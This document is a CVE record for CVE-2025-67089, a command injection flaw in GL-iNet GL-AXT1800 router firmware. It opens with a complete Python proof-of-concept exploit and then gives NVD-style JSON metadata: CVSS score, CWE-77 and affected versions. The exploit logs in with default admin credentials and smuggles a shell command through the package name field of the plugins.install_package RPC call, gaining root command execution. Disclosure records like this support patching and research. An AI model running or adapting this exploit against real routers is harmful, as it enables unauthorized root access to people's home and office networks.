CVE-2025-67089

import requests import json # CVE-2025-67089 PoC - GL-iNet GL-AXT1800 Command Injection # Target: GL-iNet GL-AXT1800 Router Firmware <= v4.6.8 target_ip = "192.168.8.1" # Router IP username = "admin" password = "admin" # Authentication session = requests.Session() login_url = f"http://{target_ip}/rpc/login" login_data = { "username": username, "password": password } response = session.post(login_url, json=login_data) if response.status_code != 200: print("[-] Authentication failed") exit(1) print("[+] Authentication successful") # Command injection via plugins.install_package RPC method inject_url = f"http://{target_ip}/rpc/plugins.install_package" # Inject command: whoami > /tmp/pwned.txt malicious_package = "; whoami > /tmp/pwned.txt #" payload = { "package": malicious_package } print(f"[*] Sending malicious request with payload: {malicious_package}") response = session.post(inject_url, json=payload) if response.status_code == 200: print("[+] Command injection successful!") print("[*] Check /tmp/pwned.txt for output") else: print(f"[-] Request failed with status: {response.status_code}")

{"cve": {"id": "CVE-2025-67089", "sourceIdentifier": "[email protected]", "published": "2026-01-08T16:15:45.333", "lastModified": "2026-01-16T21:26:11.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability exists in the GL-iNet GL-AXT1800 router firmware v4.6.8. The vulnerability is present in the `plugins.install_package` RPC method, which fails to properly sanitize user input in package names. Authenticated attackers can exploit this to execute arbitrary commands with root privileges"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:gl-inet:gl-axt1800_firmware:4.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "B6294912-0209-42AE-AC8C-2F210B502173"}, {"vulnerable": true, "criteria": "cpe:2.3:o:gl-inet:gl-axt1800_firmware:4.6.4:*:*:*:*:*:*:*", "matchCriteriaId": "1C0E557A-6CB9-4E01-A806-FD3995652EE6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:gl-inet:gl-axt1800_firmware:4.6.8:*:*:*:*:*:*:*", "matchCriteriaId": "84141895-58C3-404D-A357-42CC6A9DFF4C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:gl-inet:gl-axt1800:-:*:*:*:*:*:*:*", "matchCriteriaId": "49448661-9D95-4218-B2FA-73610AA5523C"}]}]}], "references": [{"url": "https://aleksazatezalo.medium.com/critical-command-injection-vulnerability-in-gl-inet-gl-axt1800-router-firmware-e6d67d81ee51?postPublishedType=repub", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Press/Media Coverage"]}, {"url": "https://www.gl-inet.com/security-updates/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}